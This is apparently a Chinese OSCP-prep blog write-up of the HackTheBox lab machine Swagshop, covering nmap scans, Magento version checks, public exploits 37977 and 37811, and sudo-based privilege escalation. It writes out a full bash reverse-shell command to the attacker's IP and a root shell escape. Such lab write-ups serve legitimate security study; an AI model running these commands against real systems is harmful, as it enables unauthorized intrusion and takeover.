OSCP备考_0x14_HackThBox靶机_Linux_Swagshop

Ethan医生5天前靶场17

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.180.205 (扫描TCP)

image.png




nmap -sU --top-ports 100 10.129.180.205 (扫描UDP)

image.png



访问80端口直接跳转swagshop.htb 绑定HOST


image.png

https://github.com/steverobbins/magescan/releases 查看版本

php magescan.phar scan:all http://swagshop.htb

image.png

然后查看有没有漏洞

image.png

使用37977.py,需要加index.php

image.png

image.png

有了账号密码可以执行另外一个RCE 37811

image.png

直接反弹SHELL,

python2 37811.py 'http://swagshop.htb/index.php/admin' "bash -c 'bash -i >& /dev/tcp/10.10.16.31/3334 0>&1'"

image.png

image.png

sudo -l

image.png

image.png

写入

!/bin/bash

直接跳转root权限

image.png

5c0dddff61853908d0441b804ec0a383

标签: OSCP

相关文章

OSCP备考_0x18_HackThBox靶机_Linux_Popcorn

OSCP备考_0x18_HackThBox靶机_Linux_Popcorn

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.70.193 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x15_Vulnhub靶机_DerpNStink: 1

OSCP备考_0x15_Vulnhub靶机_DerpNStink: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/derpnstink-1,221/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192...

OSCP备考_0x20_HackThBox靶机_Linux_Blocky

OSCP备考_0x20_HackThBox靶机_Linux_Blocky

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.14.190 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x09_Vulnhub靶机_SickOs: 1.1

OSCP备考_0x09_Vulnhub靶机_SickOs: 1.1

名称说明靶机下载链接https://www.vulnhub.com/entry/sickos-11,132/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.16...

OSCP备考_0x07_HackThBox靶机_Linux_​Solidstate

OSCP备考_0x07_HackThBox靶机_Linux_​Solidstate

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.57.118 (扫描TCP)nmap -sU --top-ports 100 10.129.57....

OSCP备考_0x21_HackThBox靶机_Linux_frolic

OSCP备考_0x21_HackThBox靶机_Linux_frolic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.135.112 (扫描TCP)nmap -p139,445 -A -T5 --scrip...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。